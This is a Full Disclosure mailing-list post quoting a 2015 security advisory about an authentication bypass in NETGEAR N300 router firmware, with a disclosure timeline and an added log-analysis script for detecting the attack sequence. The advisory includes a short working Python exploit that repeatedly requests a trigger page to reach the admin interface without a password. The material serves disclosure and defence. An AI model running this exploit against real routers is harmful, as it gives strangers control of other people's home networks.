I can confirm that this is actively being exploited in the wild as we speak. I got owned last week.
On Tue, Oct 6, 2015 at 7:59 AM, Alexandre Herzog <[email protected]> wrote:

> #############################################################
> #
> # COMPASS SECURITY ADVISORY
> # http://www.csnc.ch/en/downloads/advisories.html
> #
> #############################################################
> #
> # Product: Netgear Router Firmware N300_1.1.0.31_1.0.1.img
> # and N300-1.1.0.28_1.0.1.img
> # Vendor: NETGEAR
> # CVE ID: requested
> # Subject: Authentication Bypass
> # Risk: High
> # Effect: Remotely exploitable over LAN/WLAN
> # Author: Daniel Haake ([email protected])
> # Date: 06.10.2015
> #
> #############################################################
>
>
> Introduction:
> -------------
> Multiple NETGEAR wireless routers are out of the box vulnerable
> to an authentication bypass attack. No router option has to
> be changed to exploit the issue. So an attacker can access the
> administration interface of the router without submitting any valid
> username and password, just by requesting a special URL several times.
>
>
> Affected:
> ---------
> - Router Firmware: N300_1.1.0.31_1.0.1.img
> - Router Firmware: N300-1.1.0.28_1.0.1.img
> - tested and confirmed on the WNR1000v4 Router with both firmwares
> - other products may also be vulnerable because the firmware is used in
>   multiple devices
>
>
> Technical Description:
> ----------------------
> The attacker can exploit the issue by using a browser or writing a simple
> exploit.
> 1. When a user wants to access the web interface, an HTTP basic
>    authentication login process is initiated
> 2. If he does not know the username and password he gets redirected to the
>    401_access_denied.htm file
> 3. An attacker now has to call the URL
>    http://<ROUTER-IP>/BRS_netgear_success.html multiple times
>    -> After that he can access the administration web interface and there
>    is no username/password prompt
>
>
> Example Python script:
> ----------------------
> import os
> import urllib2
> import time
> import sys
>
> try:
>     first = urllib2.urlopen("http://" + sys.argv[1])
>     print "No password protection!"
> except:
>     print "Password protection detected!"
>     print "Executing exploit..."
>     for i in range(0,3):
>         time.sleep(1)
>         urllib2.urlopen("http://" + sys.argv[1] + "/BRS_netgear_success.html")
>
>     second = urllib2.urlopen("http://" + sys.argv[1])
>     if second.getcode() == 200:
>         print "Bypass successful. Now use your browser to have a look at the admin interface."
>
>
> Workaround/Fix:
> ---------------
> None so far. A patch already fixing this vulnerability was developed by
> Netgear but not released so far
> (see timeline below).
>
>
> Timeline:
> ---------
> Vendor Status: works on patch-release
> 21.07.2015: Vendor notified per email ([email protected])
>             -> No response
> 23.07.2015: Vendor notified via official chat support
> 24.07.2015: Support redirected notification to the technical team
> 29.07.2015: Requested status update and asked if they need further
>             assistance
>             -> No response
> 21.08.2015: Notified vendor that we will go full disclosure within 90 days
>             if they do not react
> 03.09.2015: Support again said that they will redirect it to the technical
>             team
> 03.09.2015: Netgear sent some beta firmware version to look if the
>             vulnerability is fixed
> 03.09.2015: Confirmed to Netgear that the problem is solved in this version
>             Asked Netgear when they plan to release the firmware with this
>             security fix
> 11.09.2015: Response from Netgear saying they will not disclose the patch
>             release day
> 15.09.2015: Asked Netgear again when they plan to publish the security fix
>             for the second time
>             -> No response
> 29.09.2015: Full disclosure of this vulnerability by SHELLSHOCK LABS
> 06.10.2015: Forced public release of this advisory to follow up on [2]
>
>
> References:
> -----------
> [1] http://support.netgear.com/product/WNR1000v4
> [2] http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html
>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
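The quoted advisory gives the exploit pattern in three steps: a 401 on the admin root, several requests to /BRS_netgear_success.html, then a 200 on the admin root with no credentials. The script below is an added detection example for that sequence, written for this thread and not part of the Compass Security advisory or any NETGEAR code. It assumes you have HTTP access logs in Apache common log format from a proxy, IDS or syslog export in front of the router (the advisory does not say what the router itself logs), and the sample lines are constructed for illustration. It flags a client that hits the trigger page at least `min_hits` times within a short window and afterwards receives a 200 for the root; the thresholds are assumptions, not values from the advisory.

```python
"""Detect the BRS_netgear_success.html authentication-bypass sequence in access logs.

Added example for defenders; not code from the advisory or from NETGEAR.
Assumes Apache common log format lines (constructed samples below).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common log format: ip ident user [timestamp] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

TRIGGER_PATH = "/BRS_netgear_success.html"  # page named in the advisory
ADMIN_PATH = "/"                             # the advisory's script re-requests the root

# Constructed sample log: 192.0.2.10 performs the full sequence,
# 192.0.2.20 only touches the trigger page once, one line is unparseable.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Oct/2015:10:00:00 +0200] "GET / HTTP/1.1" 401 -',
    '192.0.2.10 - - [06/Oct/2015:10:00:01 +0200] "GET /BRS_netgear_success.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [06/Oct/2015:10:00:02 +0200] "GET /BRS_netgear_success.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [06/Oct/2015:10:00:03 +0200] "GET /BRS_netgear_success.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [06/Oct/2015:10:00:04 +0200] "GET / HTTP/1.1" 200 4096',
    '192.0.2.20 - - [06/Oct/2015:10:05:00 +0200] "GET / HTTP/1.1" 401 -',
    '192.0.2.20 - - [06/Oct/2015:10:05:30 +0200] "GET /BRS_netgear_success.html HTTP/1.1" 200 512',
    'garbage line that does not parse',
]


def parse_line(line):
    """Parse one common-log-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {
        "ip": m.group("ip"),
        "ts": ts,
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_bypass(lines, min_hits=3, window=timedelta(minutes=5)):
    """Return {client_ip: finding} for clients matching the bypass sequence.

    A finding requires at least `min_hits` requests to TRIGGER_PATH within
    `window` (assumed thresholds) and records whether the same client later
    got a 200 for ADMIN_PATH, i.e. the unauthenticated admin page.
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        trigger_ts = [r["ts"] for r in recs if r["path"] == TRIGGER_PATH]

        # Sliding window over trigger hits: first run of min_hits within window.
        run_end = None
        for i in range(len(trigger_ts) - min_hits + 1):
            if trigger_ts[i + min_hits - 1] - trigger_ts[i] <= window:
                run_end = trigger_ts[i + min_hits - 1]
                break
        if run_end is None:
            continue

        admin_ok = any(
            r["path"] == ADMIN_PATH and r["status"] == 200 and r["ts"] >= run_end
            for r in recs
        )
        findings[ip] = {"trigger_hits": len(trigger_ts), "admin_200_after": admin_ok}
    return findings


if __name__ == "__main__":
    for ip, f in detect_bypass(SAMPLE_LOG).items():
        severity = "CONFIRMED" if f["admin_200_after"] else "ATTEMPT"
        print(f"{severity}: {ip} hit {TRIGGER_PATH} {f['trigger_hits']} times")
```

Feed real logs with `detect_bypass(open(path).read().splitlines())`; a hit with `admin_200_after` true means the device should be treated as compromised until the patched firmware is applied, while `admin_200_after` false still indicates an attempt worth blocking at the source address.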
